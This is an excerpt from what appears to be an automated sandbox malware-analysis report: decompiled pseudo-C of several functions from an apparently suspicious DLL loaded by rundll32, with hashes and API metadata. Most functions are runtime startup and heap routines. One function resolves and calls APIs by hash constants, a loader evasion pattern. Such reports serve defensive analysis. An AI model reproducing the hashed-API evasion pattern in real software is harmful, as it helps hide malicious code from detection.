                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: ed12e3e9fc01d63de37b33e3843679f597bd6b0e82b1cd53f27575ca23013bb1
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: 784161213067A186EF5CDB5AA44879B77A1BBC9FC8F248025DE4E43746EF38C516C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 41%
                                			E00000201201A29A2DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                                				intOrPtr _v88;
                                				void* _v96;
                                				void* _v104;
                                				long long _v112;
                                				signed int _v120;
                                				long long _v128;
                                				long long _v136;
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t72;
                                				signed int _t80;
                                				void* _t81;
                                				void* _t97;
                                				signed int _t98;
                                				void* _t99;
                                				void* _t114;
                                				long long* _t139;
                                				signed long long _t140;
                                				long long* _t142;
                                				void* _t143;
                                				void* _t169;
                                				void* _t170;
                                				void* _t172;
                                				signed int _t173;
                                				long _t177;
                                				void* _t179;
                                				void* _t190;
                                				void* _t191;
                                				void* _t192;
                                				signed int* _t193;
                                				long long _t194;
                                				void* _t200;
                                				long _t202;
                                				void* _t205;
                                
                                				_t191 = _t179;
                                				 *((long long*)(_t191 + 0x18)) = __r8;
                                				 *((long long*)(_t191 + 0x10)) = __rdx;
                                				_t203 =  *0xa29ad458;
                                				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
                                				_t170 = __rcx;
                                				_v120 =  *0xa29ad450;
                                				r15d = 0;
                                				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
                                				_v112 =  *((intOrPtr*)( *0xa29ad458 + 8));
                                				if (E00000201201A29A4320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0xa29a2e29;
                                				_t12 = _t205 + 1; // 0x1
                                				r12d = _t12;
                                				_v104 = _t172;
                                				goto 0xa29a2e34;
                                				_t173 = _v104;
                                				r12d = 2;
                                				_t15 =  &_a32; // 0xca
                                				if (E00000201201A29A4880(r12d, _t114,  *((intOrPtr*)( *0xa29ad458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0xa29a2f94;
                                				r8d = _a32;
                                				r13d = r8d;
                                				r13d = r13d - r12d;
                                				_t193 = _v96;
                                				if (_t173 == 0) goto 0xa29a2e8d;
                                				_t72 = _a8;
                                				_t193[0xa] = 1;
                                				_t193[0x12] = _t173;
                                				_t193[0xd] = _t72;
                                				_t193[0x10] = _t72;
                                				_t25 = _t170 + 0xc0; // 0xc0
                                				r9d = 0;
                                				 *_t193 = _v120 ^ 0x62ade362;
                                				_t193[3] =  *(_t170 + 0x48);
                                				_t193[2] =  *(_t170 + 0x4c);
                                				_t30 =  &_a8; // 0xb2
                                				_v128 = _t30;
                                				_t32 =  &_v120; // 0x32
                                				_v136 = _t32;
                                				_t97 = E00000201201A29A1BFC(_t32, _t143, _t25, _t193);
                                				HeapFree(_t205, _t202, _t200);
                                				if (r13d == 0) goto 0xa29a2f01;
                                				if (_t97 == 0) goto 0xa29a2ef6;
                                				if (_t97 != 0x10d2) goto 0xa29a2f01;
                                				E00000201201A29AA3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
                                				if (_t97 != 0) goto 0xa29a2f94;
                                				_t98 = _a8;
                                				_t194 = _v120;
                                				r13d =  *(_t170 + 0x4c);
                                				_t80 = E00000201201A29A6C1C(_t98, _t194);
                                				_t38 =  &_a8; // 0xb2
                                				r9d = 1;
                                				 *(_t170 + 0x48) = _t98;
                                				 *(_t170 + 0x4c) = _t80;
                                				_t81 = E00000201201A29A7B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
                                				_t99 = _t81;
                                				if (_t81 != 0) goto 0xa29a2f71;
                                				_t139 = _a16;
                                				 *_t139 = _t194;
                                				 *_a24 = _a8;
                                				if ( *(_t170 + 0x4c) != r13d) goto 0xa29a2fcd;
                                				goto 0xa29a2fc7;
                                				HeapFree(_t172, _t177, _t143);
                                				_t47 = _t170 + 0xc0; // 0xc0
                                				E00000201201A29A47B8(_t99, _t139, _t143, _t47, _t177);
                                				goto 0xa29a2faf;
                                				if (_t99 == 0x10d2) goto 0xa29a2fc2;
                                				_t48 = _t170 + 0xc0; // 0xc0
                                				if (E00000201201A29A47B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0xa29a2fcd;
                                				asm("lock or dword [edi+0xec], 0x1");
                                				goto 0xa29a2fcd;
                                				r15d = 1;
                                				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0xa29a302f;
                                				E00000201201A29A908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t139 == 0) goto 0xa29a2fed;
                                				 *_t139();
                                				if (r15d == 0) goto 0xa29a301c;
                                				_t140 =  *((intOrPtr*)(_t170 + 0x58));
                                				if (_v88 - _t140 <= 0) goto 0xa29a301c;
                                				_t57 = _t170 + 0xc0; // 0xc1
                                				if (E00000201201A29A47B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0xa29a301c;
                                				asm("lock or dword [edi+0xec], 0x1");
                                				_t142 = _t140 * 0x23c34600 + _v88;
                                				 *((long long*)(_t170 + 0x58)) = _t142;
                                				if (_v104 == 0) goto 0xa29a308e;
                                				HeapFree(??, ??, ??);
                                				if (_t99 == 0) goto 0xa29a304e;
                                				if (_t99 != 0x10d2) goto 0xa29a308e;
                                				E00000201201A29A908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
                                				if (_t142 == 0) goto 0xa29a3067;
                                				 *_t142();
                                				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
                                				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
                                				E00000201201A29A908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
                                				if (_t142 == 0) goto 0xa29a308e;
                                				 *_t142();
                                				return _t99;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: c40eebda2bd87cf1b59b6ef16b6a848b29b1cd0fcc7af68622d451b3d3e4959c
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: 2381A2327027A096EF58CB1AE54879F73A4F788B88F214025EF4947B86DF39D466CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: 9bfbeb966fe58ed17cbce691f12914b5c72d9539aae2f10904eb1771da0a80f3
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 9E211D61702B7081FF98DB6AD54836E63A1EB89FC8F685025DE0D5779ACF38C892C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EB3A0(void* __edx) {
                                				void* _t5;
                                
                                				_t5 = __edx;
                                				if (_t5 == 0) goto 0x130eb3e1;
                                				if (_t5 == 0) goto 0x130eb3d5;
                                				if (_t5 == 0) goto 0x130eb3c8;
                                				if (__edx == 1) goto 0x130eb3c1;
                                				return 1;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                • String ID:
                                • API String ID: 3885183344-0
                                • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction ID: 16b6b08da8b7b05c29702a84e49a71bc7655186e0b7c35f39b35c38ddf256081
                                • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction Fuzzy Hash: 39519E21F0CE6F85FA24AB66A4422B926E0AF543ACF644031E54D377E7DE2CE465C734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0A59
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0ABB
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0AF5
                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0B1F
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                • String ID:
                                • API String ID: 1557788787-0
                                • Opcode ID: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction ID: 75863bbc0e5a97b7931cc7ec22bc21650c1f600872e9325186121a1c448551bc
                                • Opcode Fuzzy Hash: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction Fuzzy Hash: A1213431F18BA982E620CF11A94002AA6E8BB58BECB184174DE4E73B94DF3CE461C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 52%
                                			E00007FFC7FFC130ED734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                				long long _v56;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t27;
                                				intOrPtr _t36;
                                				intOrPtr* _t62;
                                				long long _t68;
                                				void* _t70;
                                				long long _t84;
                                				signed int _t85;
                                				intOrPtr* _t86;
                                				void* _t89;
                                
                                				_t70 = __rcx;
                                				_a8 = __rbx;
                                				_t2 = _t70 - 1; // -1
                                				r14d = __ecx;
                                				if (_t2 - 1 <= 0) goto 0x130ed768;
                                				_t27 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t27);
                                				goto 0x130ed897;
                                				E00007FFC7FFC130F05F8();
                                				r8d = 0x104;
                                				GetModuleFileNameA(??, ??, ??);
                                				_t86 =  *0x13124950; // 0x27a6bdf3370
                                				 *0x13124960 = 0x131243e0;
                                				if (_t86 == 0) goto 0x130ed79f;
                                				if ( *_t86 != dil) goto 0x130ed7a2;
                                				_t62 =  &_a32;
                                				_a24 = _t85;
                                				_v56 = _t62;
                                				r8d = 0;
                                				_a32 = _t85;
                                				E00007FFC7FFC130ED514(0x131243e0, 0x131243e0, 0x131243e0, _t85, 0x131243e0, _t89, __r8,  &_a24);
                                				r8d = 1;
                                				E00007FFC7FFC130ED6D0(_a24, _a32, __r8); // executed
                                				_t68 = _t62;
                                				if (_t62 != 0) goto 0x130ed7f3;
                                				E00007FFC7FFC130EE6A0(_t62);
                                				_t10 = _t68 + 0xc; // 0xc
                                				 *_t62 = _t10;
                                				goto 0x130ed892;
                                				_v56 =  &_a32;
                                				E00007FFC7FFC130ED514(_t68, 0x131243e0, _t68, _t85, 0x131243e0, _t89, _t62 + _a24 * 8,  &_a24);
                                				if (r14d != 1) goto 0x130ed829;
                                				_t36 = _a24 - 1;
                                				 *0x13124940 = _t68;
                                				 *0x1312493c = _t36;
                                				goto 0x130ed7ec;
                                				_a16 = _t85;
                                				0x130efef4();
                                				if (_t36 == 0) goto 0x130ed858;
                                				E00007FFC7FFC130EE114( &_a32, _a16);
                                				_a16 = _t85;
                                				E00007FFC7FFC130EE114( &_a32, _t68);
                                				goto 0x130ed897;
                                				_t84 = _a16;
                                				if ( *_t84 == _t85) goto 0x130ed873;
                                				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x130ed867;
                                				 *0x1312493c = 0;
                                				_a16 = _t85;
                                				 *0x13124940 = _t84;
                                				E00007FFC7FFC130EE114(_t84 + 8, _t85 + 1);
                                				_a16 = _t85;
                                				E00007FFC7FFC130EE114(_t84 + 8, _t68);
                                				return _t36;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: FileModuleName_invalid_parameter_noinfo
                                • String ID: C:\Windows\system32\rundll32.exe
                                • API String ID: 3307058713-1534550049
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EB89C(void* __ecx) {
                                				void* __rbx;
                                				void* _t12;
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                
                                				_t2 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
                                				 *0x131241f8 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
                                				E00007FFC7FFC130EBDF4(1, _t12, _t17, _t18, _t19, _t20);
                                				if (E00007FFC7FFC130EC7DC() != 0) goto 0x130eb8cb;
                                				goto 0x130eb8df; // executed
                                				E00007FFC7FFC130EE090(_t17); // executed
                                				if (0 != 0) goto 0x130eb8dd;
                                				E00007FFC7FFC130EC838(0);
                                				goto 0x130eb8c7;
                                				return 1;
                                			}










                                APIs
                                • __isa_available_init.LIBCMT ref: 00007FFC130EB8B9
                                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC130EB8BE
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC130EC7E0
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC130EC7E5
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC130EC7EA
                                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC130EB8D6
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                • String ID:
                                • API String ID: 3388242289-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 71%
                                			E00007FFC7FFC130F3AC0(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                				long long _v24;
                                				void* _t18;
                                				intOrPtr _t21;
                                				intOrPtr _t23;
                                				intOrPtr _t24;
                                				void* _t32;
                                				long long _t39;
                                				signed long long _t45;
                                
                                				_t39 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rsi;
                                				_a24 = __rdi;
                                				_t32 = __ecx;
                                				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x130f3afd;
                                				_t18 = E00007FFC7FFC130EE6A0(__rax);
                                				 *((intOrPtr*)(__rax)) = 9;
                                				E00007FFC7FFC130EE580(_t18);
                                				goto 0x130f3b61;
                                				E00007FFC7FFC130EF2B0();
                                				_t45 = __rbx;
                                				_v24 = __rbx;
                                				_t21 =  *0x13124d70; // 0x40
                                				if (_t32 - _t21 < 0) goto 0x130f3b55;
                                				if ( *((intOrPtr*)(0x13124970 + __rbx * 8)) == __rbx) goto 0x130f3b29;
                                				goto 0x130f3b4b; // executed
                                				E00007FFC7FFC130F39D8( *((intOrPtr*)(0x13124970 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
                                				 *((long long*)(0x13124970 + _t45 * 8)) = _t39;
                                				if (_t39 != 0) goto 0x130f3b3c;
                                				goto 0x130f3b55;
                                				_t23 =  *0x13124d70; // 0x40
                                				_t24 = _t23 + 0x40;
                                				 *0x13124d70 = _t24;
                                				_v24 = _t45 + 1;
                                				goto 0x130f3b16;
                                				E00007FFC7FFC130EF304();
                                				goto 0x130f3af9;
                                				return _t24;
                                			}












                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 37%
                                			E00007FFC7FFC130EE26C(void* __eax, signed int __rcx, signed int __rdx) {
                                				void* __rbx;
                                				intOrPtr* _t22;
                                				signed int _t29;
                                
                                				_t29 = __rdx;
                                				if (__rcx == 0) goto 0x130ee28b;
                                				_t1 = _t29 - 0x20; // -32
                                				_t22 = _t1;
                                				if (_t22 - __rdx < 0) goto 0x130ee2ce;
                                				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                				goto 0x130ee2b2;
                                				if (E00007FFC7FFC130F1374() == 0) goto 0x130ee2ce;
                                				if (E00007FFC7FFC130F0F5C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x130ee2ce;
                                				RtlAllocateHeap(??, ??, ??); // executed
                                				if (_t22 == 0) goto 0x130ee29d;
                                				goto 0x130ee2db;
                                				E00007FFC7FFC130EE6A0(_t22);
                                				 *_t22 = 0xc;
                                				return 0;
                                			}







                                APIs
                                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC130EF1A8,?,?,0000B74F7D657C87,00007FFC130EE6A9,?,?,?,?,00007FFC130EE139,?,?,?), ref: 00007FFC130EE2C1
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EE374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                				void* __rdi;
                                				void* _t36;
                                				int _t40;
                                				void* _t43;
                                				void* _t44;
                                				intOrPtr _t52;
                                				signed long long _t62;
                                				long long _t65;
                                				_Unknown_base(*)()* _t85;
                                				void* _t89;
                                				void* _t90;
                                				void* _t92;
                                				signed long long _t93;
                                				struct _EXCEPTION_POINTERS* _t99;
                                
                                				_t45 = __ecx;
                                				 *((long long*)(_t92 + 0x10)) = __rbx;
                                				 *((long long*)(_t92 + 0x18)) = __rsi;
                                				_t3 = _t92 - 0x4f0; // -1288
                                				_t90 = _t3;
                                				_t93 = _t92 - 0x5f0;
                                				_t62 =  *0x13123760; // 0xb74f7d657c87
                                				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                                				_t52 = r8d;
                                				_t44 = __ecx;
                                				if (__ecx == 0xffffffff) goto 0x130ee3b3;
                                				E00007FFC7FFC130EBC04(_t36);
                                				_t5 = _t93 + 0x70; // 0x58
                                				r8d = 0x98;
                                				E00007FFC7FFC130EC440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
                                				_t6 = _t90 + 0x10; // -1272
                                				r8d = 0x4d0;
                                				E00007FFC7FFC130EC440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
                                				_t7 = _t93 + 0x70; // 0x58
                                				 *((long long*)(_t93 + 0x48)) = _t7;
                                				_t10 = _t90 + 0x10; // -1272
                                				_t65 = _t10;
                                				 *((long long*)(_t93 + 0x50)) = _t65;
                                				__imp__RtlCaptureContext();
                                				r8d = 0;
                                				__imp__RtlLookupFunctionEntry();
                                				if (_t65 == 0) goto 0x130ee446;
                                				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                                				_t16 = _t93 + 0x60; // 0x48
                                				 *((long long*)(_t93 + 0x30)) = _t16;
                                				_t19 = _t93 + 0x58; // 0x40
                                				 *((long long*)(_t93 + 0x28)) = _t19;
                                				_t21 = _t90 + 0x10; // -1272
                                				 *((long long*)(_t93 + 0x20)) = _t21;
                                				__imp__RtlVirtualUnwind();
                                				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                                				_t25 = _t90 + 0x508; // 0x0
                                				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                                				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
                                				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                                				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
                                				_t40 = IsDebuggerPresent();
                                				SetUnhandledExceptionFilter(_t85, _t89);
                                				if (UnhandledExceptionFilter(_t99) != 0) goto 0x130ee4a8;
                                				if (_t40 != 0) goto 0x130ee4a8;
                                				if (_t44 == 0xffffffff) goto 0x130ee4a8;
                                				_t43 = E00007FFC7FFC130EBC04(_t42);
                                				E00007FFC7FFC130F6D80();
                                				return _t43;
                                			}

















                                0x7ffc130ee4ce

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E00007FFC7FFC130EF964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                                				long long _v72;
                                				intOrPtr _v80;
                                				void* _v88;
                                				long long _v96;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t33;
                                				void* _t37;
                                				intOrPtr* _t66;
                                				signed long long _t68;
                                				long long _t70;
                                				long long _t72;
                                				long long _t78;
                                				void* _t83;
                                				void* _t90;
                                				long long _t104;
                                				long long _t108;
                                				void* _t110;
                                				intOrPtr* _t112;
                                				void* _t114;
                                				void* _t117;
                                				intOrPtr _t129;
                                				void* _t131;
                                				void* _t132;
                                				signed long long _t133;
                                				signed long long _t134;
                                				signed long long _t137;
                                				intOrPtr* _t138;
                                
                                				_t66 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rdx;
                                				if (__rdx != 0) goto 0x130ef9a0;
                                				_t33 = E00007FFC7FFC130EE6A0(__rax);
                                				_t3 = _t108 + 0x16; // 0x16
                                				 *__rax = _t3;
                                				E00007FFC7FFC130EE580(_t33);
                                				goto 0x130efb40;
                                				asm("xorps xmm0, xmm0");
                                				 *((long long*)(__rdx)) = _t108;
                                				asm("movdqu [ebp-0x20], xmm0");
                                				_v72 = _t108;
                                				if ( *__rcx == _t108) goto 0x130efa0b;
                                				_a24 = 0x3f2a;
                                				_a26 = dil;
                                				E00007FFC7FFC130F3218( *__rcx,  &_a24);
                                				if (_t66 != 0) goto 0x130ef9e2;
                                				r8d = 0;
                                				_t37 = E00007FFC7FFC130EFB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
                                				goto 0x130ef9ee;
                                				0x130efc80();
                                				r14d = _t37;
                                				if (_t37 != 0) goto 0x130ef9fe;
                                				goto 0x130ef9b2;
                                				goto 0x130efb04;
                                				_t112 = _v88;
                                				_t129 = _v80;
                                				_a24 = _t108;
